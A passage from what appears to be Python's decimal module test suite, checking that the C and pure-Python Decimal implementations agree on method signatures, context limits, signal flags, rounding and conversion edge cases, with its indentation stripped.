self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
